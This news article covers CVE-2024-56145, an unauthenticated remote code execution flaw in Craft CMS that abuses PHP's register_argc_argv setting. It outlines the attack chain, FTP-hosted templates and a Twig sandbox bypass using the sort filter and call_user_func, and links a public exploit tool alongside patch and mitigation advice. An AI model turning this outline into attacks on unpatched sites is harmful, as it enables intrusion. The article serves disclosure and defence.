A significant security vulnerability in Craft CMS, one of the most widely used PHP-based content management systems, has been uncovered, allowing unauthenticated remote code execution (RCE) under default configurations.The vulnerability, identified as [CVE-2024-56145](https://nvd.nist.gov/vuln/detail/CVE-2024-56145), was disclosed by security researchers and has already been addressed by the Craft CMS team with a patch released within 24 hours.PHP, a language that has undergone substantial improvements over the years, is no stranger to security challenges. While older vulnerabilities such as `register_globals` and `magic_quotes_gpc` have been eradicated, certain quirks in its design can still lead to critical issues.The recently exposed flaw in [Craft CMS](https://github.com/craftcms) highlights how seemingly innocuous PHP behaviors can create exploitable conditions.At the heart of this vulnerability is the `register_argc_argv` configuration setting in PHP.This setting determines whether command-line arguments (`$_SERVER[‘argc’]` and `$_SERVER[‘argv’]`) are populated when a script is run.By default, `register_argc_argv` is enabled in PHP, which can lead to unexpected behavior when query strings are passed to web-hosted PHP scripts. In Craft CMS’s official Docker image, this setting is turned on, creating an exploitable scenario.**How the Vulnerability Works**——————————-The flaw lies in how Craft CMS processes certain command-line options during its bootstrap sequence. Specifically, developers discovered that query strings could be used to manipulate paths for critical files like configuration files or templates.By exploiting this behavior, attackers could gain control over file paths and potentially execute arbitrary code.Researchers demonstrated that by using an `ftp://` wrapper to host malicious templates on an FTP server, they could bypass security checks and inject executable code into a vulnerable Craft CMS instance.Further [analysis](https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms) by Adam Kues revealed that while Craft CMS attempts to sandbox its template engine (Twig) to prevent malicious code execution, clever workarounds—such as using the `sort` filter with `call_user_func`—allowed attackers to bypass these defenses and achieve RCE.**Impact and Mitigation**————————-Craft CMS is used by over 150,000 websites globally, including large enterprises. The vulnerability posed a significant risk to organizations using default configurations of the platform.However, the Craft CMS team acted swiftly to address the issue, releasing patched versions 5.5.2+ and 4.13.2+. Users are strongly advised to upgrade their installations immediately.For those unable to update, disabling the `register_argc_argv` setting in their `php.ini` file provides an effective workaround to mitigate this specific vulnerability.This incident underscores the importance of understanding PHP’s nuanced behaviors when developing secure applications.Developers are encouraged to explicitly check whether code is running in a command-line interface (CLI) environment using robust methods like verifying the `PHP_SAPI` variable rather than relying on potentially ambiguous indicators like `$_SERVER[‘argv’]`.The rapid response by both researchers and the Craft CMS team highlights the value of responsible disclosure and proactive patching in minimizing the impact of security vulnerabilities.While PHP has matured significantly as a language, its legacy behaviors continue to present challenges for developers and security professionals alike.The CVE-2024-56145 vulnerability serves as a reminder of how small misconfigurations or overlooked features can lead to severe consequences if exploited by attackers.Researchers also published an **[CVE-2024-56145 exploitation tool](https://github.com/Chocapikk/CVE-2024-56145)**allowing attackers to achieve Remote Code Execution (RCE) via specially crafted payloads.Organizations must remain vigilant by keeping their software up-to-date and adopting secure coding practices to protect their systems from emerging threats.For More Interesting Daily Cybersecurity Stories, Follow us on [**LinkedIn**](https://www.linkedin.com/company/cybersecurity-news/), **[X](https://x.com/The_Cyber_News)** and [**Google News**](https://news.google.com/publications/CAAqBwgKMOffpwsw1Oq_Aw?hl=en-IN&gl=IN&ceid=IN%3Aen)The post [Critical PHP Zero-Day Vulnerability in Craft CMS Lets Hackers Gain Remote Access](https://cybersecuritynews.com/php-zero-day-vulnerability/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
Related Tags:
NAICS: 56 – Administrative And Support And Waste Management And Remediation Services
NAICS: 54 – Professional
Scientific
Technical Services
NAICS: 561 – Administrative And Support Services
NAICS: 541 – Professional
Scientific
Technical Services
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 92 – Public Administration
NAICS: 51 – Information
NAICS: 928 – National Security And International Affairs
Blog: Cybersecurity News
Associated Indicators: